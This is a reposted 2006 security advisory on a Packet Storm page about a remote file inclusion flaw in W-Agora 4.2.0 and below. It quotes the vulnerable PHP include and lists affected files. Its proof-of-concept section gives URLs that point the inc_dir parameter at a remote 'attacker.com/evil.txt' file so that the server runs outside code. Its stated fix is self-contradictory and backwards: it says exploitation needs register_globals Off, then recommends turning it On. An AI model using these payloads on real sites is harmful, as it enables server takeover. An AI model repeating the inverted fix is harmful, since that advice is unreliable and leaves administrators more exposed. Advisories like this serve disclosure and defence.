what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Echo Security Advisory 2006.34

Echo Security Advisory 2006.34
Posted Jun 27, 2006
Authored by Echo Security, the_day | Site theday.echo.or.id

W-Agora (Web-Agora) versions 4.2.0 and below suffer from remote file inclusion flaws.

tags | exploit, remote, web, file inclusion
SHA-256 | d1e22c145556e20631976cc596ff225ba1e6348491de3416eaa20972fe780b8d
Download | Favorite | View

Echo Security Advisory 2006.34

Change Mirror Download
ECHO.OR.ID
ECHO_ADV_34$2006

---------------------------------------------------------------------------------------------------
[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir)  Remote File Inclusion
---------------------------------------------------------------------------------------------------

Author    : Dedi Dwianto a.k.a the_day
Date Found  : June, 20th 2006
Location  : Indonesia, Jakarta
web    : http://advisories.echo.or.id/adv/adv34-theday-2006.txt
Critical Lvl  : Highly critical
Impact    : System access
Where    : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
W-Agora (Web-Agora)

Application  : W-Agora (Web-Agora)
version    : <= 4.2.0
URL    : http://w-agora.net
Description   :

W-Agora (Web-Agora) is a database-driven communications system which allows you and your visitors to store and 
display messages, files, and other information on your web site. More than "just another Web BBS/forum software", 
W-Agora is designed so it can be easily customizable through a Web browser and the use of templates.
It can be used as a BBS, guestbook, download area, or publishing system. 
Several database backends are supported such as MySQL, Postgres, mSQL, Oracle and DBM.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~

-----------------------insert.php----------------------
....
<?php
  if ($bn_search && ($bn_doc_type == "static") && ($bn_search_engine != "none") ) {
                include "$inc_dir/$bn_search_engine.$ext";
                $search->indexNotes();
        }

        ?>
...
----------------------------------------------------------

Input passed to the "inc_dir" parameter in insert.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources

Affected files: 

admin_notes.php
admin_subscribed_user.php
admin_user.php
browse_avatar.php
close.php
create_forum.php
create_site.php
create_user.php
delete.php
delete_site.php
download_forum.php
editconf.php
edit_site.php
export.php
forgot_password.php
index.php
insert.php
search.php
view.php
update.php
setup.php
profile.php
register.php
rss.php
list.php
forgot_password.php
include/mail.php
include/fileupload.php
include/msql.php
include/dbaccess.php
include/form.php
include/postgres65.php
include/postgres.php
include/mysql.php
extras/quicklist.php
extras/shared_user.php
user/ldap_example.php
tools/upgrade_401.php
tools/upgrade_402.php
tools/upgrade_42.php
tools/upgrade_site_401.php
tools/upgrade_site_402.php

Successful exploitation requires that "register_globals= Off ".

Proof Of Concept:
~~~~~~~~~~~~~~~~~

http://target.com/[w-agora_path]/index.php?inc_dir=http://target.com//inject.txt?
http://target.com/[w-agora_path]/search.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/view.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/update.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/tools/upgrade_401.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/include/mail.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/extras/quicklist.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/register.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/rss.php?inc_dir=http://attacker.com/evil.txt?

and more Affected files


Solution:
~~~~~~~~~
Change register_globals= On 
in php.ini

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ Lieur-Euy,Mr_ny3m,bithedz,an0maly
~ newbie_hacker[at]yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     the_day || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close